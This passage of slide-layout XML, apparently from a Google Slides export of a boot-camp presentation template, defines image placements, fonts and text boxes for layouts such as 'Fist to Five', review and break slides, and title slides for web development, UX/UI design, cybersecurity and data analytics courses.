          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="984" name="Google Shape;984;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="985" name="Google Shape;985;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="986" name="Google Shape;986;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="987" name="Google Shape;987;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="988" name="Google Shape;988;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="989" name="Google Shape;989;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="990" name="Google Shape;990;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>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47. Fist to Five">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 991"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="992" name="Google Shape;992;p48"/>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993" name="Google Shape;993;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="3307075"/>
            <a:ext cx="8595300" cy="15615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000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto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94" name="Google Shape;994;p4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995" name="Google Shape;995;p48"/>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96" name="Google Shape;996;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="827549" y="769725"/>
            <a:ext cx="7488902" cy="1856625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="997" name="Google Shape;997;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202525" y="2754341"/>
            <a:ext cx="8595300" cy="371100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="91425" rIns="0" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>FIST TO FIVE:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="998" name="Google Shape;998;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="3307075"/>
            <a:ext cx="45330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48. Review">
  <p:cSld name="CUSTOM_17_2_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 999"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1000" name="Google Shape;1000;p49"/>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001" name="Google Shape;1001;p4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002" name="Google Shape;1002;p49"/>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03" name="Google Shape;1003;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="2880775"/>
            <a:ext cx="85953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a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Times Up! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Let’s Review.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1004" name="Google Shape;1004;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3960959" y="1143000"/>
            <a:ext cx="1222082" cy="1638675"/>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49. Take a Break 1">
  <p:cSld name="CUSTOM">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1005"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1006" name="Google Shape;1006;p5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1007" name="Google Shape;1007;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143971" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1008" name="Google Shape;1008;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25" y="944800"/>
            <a:ext cx="91440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1009" name="Google Shape;1009;p50"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="2001900"/>
            <a:ext cx="45330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5. Subsection Slide">
  <p:cSld name="CUSTOM_17_2_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Google Shape;48;p6"/>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49" name="Google Shape;49;p6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325"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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>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50" name="Google Shape;50;p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r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;51;p6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="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52" name="Google Shape;52;p6"/>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50. Take a Break 2">
  <p:cSld name="CUSTOM_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1010"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1011" name="Google Shape;1011;p5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1012" name="Google Shape;1012;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143971" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1013" name="Google Shape;1013;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25" y="411400"/>
            <a:ext cx="91440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1014" name="Google Shape;1014;p51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="1468500"/>
            <a:ext cx="45330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1. Title Slide: Web Development">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1017"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1018" name="Google Shape;1018;p53"/>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1019" name="Google Shape;1019;p53"/>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53"/>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
        <p:nvSpPr>
          <p:cNvPr id="1021" name="Google Shape;1021;p53"/>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Web Development</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1022" name="Google Shape;1022;p53"/>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1023" name="Google Shape;1023;p53"/>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24" name="Google Shape;1024;p53"/>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25" name="Google Shape;1025;p53"/>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1026" name="Google Shape;1026;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="776110" y="1231212"/>
            <a:ext cx="2286002" cy="1703068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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2. Title Slide: UX/UI Design">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1027"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Google Shape;1028;p54"/>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1029" name="Google Shape;1029;p54"/>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54"/>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UX/UI Design</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Google Shape;1031;p54"/>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1032" name="Google Shape;1032;p54"/>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33" name="Google Shape;1033;p54"/>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34" name="Google Shape;1034;p54"/>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1035" name="Google Shape;1035;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="584735" y="1058550"/>
            <a:ext cx="2560322" cy="1920238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1036" name="Google Shape;1036;p54"/>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3. Title Slide: Cybersecurity ">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1037"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1038" name="Google Shape;1038;p55"/>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1039" name="Google Shape;1039;p55"/>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55"/>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Cybersecurity Boot Camp</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1041" name="Google Shape;1041;p55"/>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1042" name="Google Shape;1042;p55"/>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43" name="Google Shape;1043;p55"/>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44" name="Google Shape;1044;p55"/>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1045" name="Google Shape;1045;p55"/>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1046" name="Google Shape;1046;p55"/>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4. Title Slide:Data Analytics and Visualization">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1047"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1048" name="Google Shape;1048;p56"/>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1049" name="Google Shape;1049;p56"/>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50" name="Google Shape;1050;p56"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1051" name="Google Shape;1051;p56"/>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1052" name="Google Shape;1052;p56"/>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Analytics and Visualization</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053" name="Google Shape;1053;p56"/>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54" name="Google Shape;1054;p56"/>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55" name="Google Shape;1055;p56"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1056" name="Google Shape;1056;p56"/>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5. Subsection Slide">
  <p:cSld name="CUSTOM_17_2_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1057"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1058" name="Google Shape;1058;p57"/>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059" name="Google Shape;1059;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325"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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>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1060" name="Google Shape;1060;p5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r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1061" name="Google Shape;1061;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="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062" name="Google Shape;1062;p57"/>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6. Transition Slide">
  <p:cSld name="CUSTOM_17_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1063"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1064" name="Google Shape;1064;p58"/>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065" name="Google Shape;1065;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237100"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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>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1066" name="Google Shape;1066;p5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067" name="Google Shape;1067;p58"/>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7. Text Only">
  <p:cSld name="CUSTOM_2_7_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1068"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069" name="Google Shape;1069;p5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70" name="Google Shape;1070;p5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071" name="Google Shape;1071;p5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072" name="Google Shape;1072;p5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073" name="Google Shape;1073;p5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074" name="Google Shape;1074;p5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75" name="Google Shape;1075;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3622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8. Text with Sidebar">
  <p:cSld name="CUSTOM_2_4_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1076"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1077" name="Google Shape;1077;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="119" b="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7048950" y="910275"/>
            <a:ext cx="1828800" cy="3784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1078" name="Google Shape;1078;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="66747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79" name="Google Shape;1079;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1245800"/>
            <a:ext cx="6699600" cy="38976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1080" name="Google Shape;1080;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DBD9E8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
